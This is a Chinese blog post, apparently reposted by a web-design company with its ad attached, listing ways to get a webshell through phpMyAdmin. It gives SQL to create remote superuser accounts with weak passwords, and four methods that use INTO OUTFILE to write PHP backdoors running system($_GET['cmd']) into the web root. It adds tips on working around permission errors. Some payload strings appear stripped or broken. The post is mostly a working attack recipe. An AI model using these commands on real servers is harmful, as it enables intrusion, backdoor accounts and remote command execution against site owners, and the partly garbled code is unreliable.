PHPmyadmin拿shell的方法有哪些

这篇文章将为大家详细讲解有关PHPmyadmin拿shell的方法有哪些，小编觉得挺实用的，因此分享给大家做个参考，希望大家阅读完这篇文章后可以有所收获。

创新互联公司从2013年创立，是专业互联网技术服务公司，拥有项目成都做网站、网站制作网站策划，项目实施与项目整合能力。我们以让每一个梦想脱颖而出为使命，1280元尖草坪做网站,已为上家服务,为尖草坪各地企业和个人服务,联系电话:18980820575

PHPmyadmin修改用户密码

直接点击上面的localhost或者1270.0.1，出现用户一栏，点击修改即可

添加超级用户guetsec密码ooxx并且允许外连

GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;

我们可以创建root账户设置密码

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;

这样就创建了root外联账户，密码123456，外链时用123456

拿shell四种经典方法：

方法一：

CREATE TABLE `MySQL`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES ('');
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
    一句话连接密码：7on

方法二：

读取文件内容：    select load_file('E:/xamp/www/s.php');
写一句话：    select ''INTO OUTFILE 'E:/xamp/www/study.php'
cmd执行权限：    select '\';system($_GET[\'cmd\']); echo \'

方法三：

JhackJ版本 PHPmyadmin拿shell

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES('');
select cmd from study into outfile 'E:/wamp/www/7.php';
   
Drop TABLE IF EXISTS study;
   

--------------------------------------------------------------------------------

   
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES ('');# 影响列数： 1
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数： 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。

方法四：

select load_file('E:/xamp/www/study.php');
select '\';system($_GET[\'cmd\']); echo \'

然后访问网站目录：http://www.2cto.com/study.php?cmd=dir

Phpmyadmin导出一句话时出现(Errcode: 13 - Permission denied)

是对此目录没有权限，可以试试上级目录，或者下级目录

再不行试试NTS引流

还有就是注意目录\

关于“PHPmyadmin拿shell的方法有哪些”这篇文章就分享到这里了，希望以上内容可以对大家有一定的帮助，使各位可以学到更多知识，如果觉得文章不错，请把它分享出去让更多的人看到。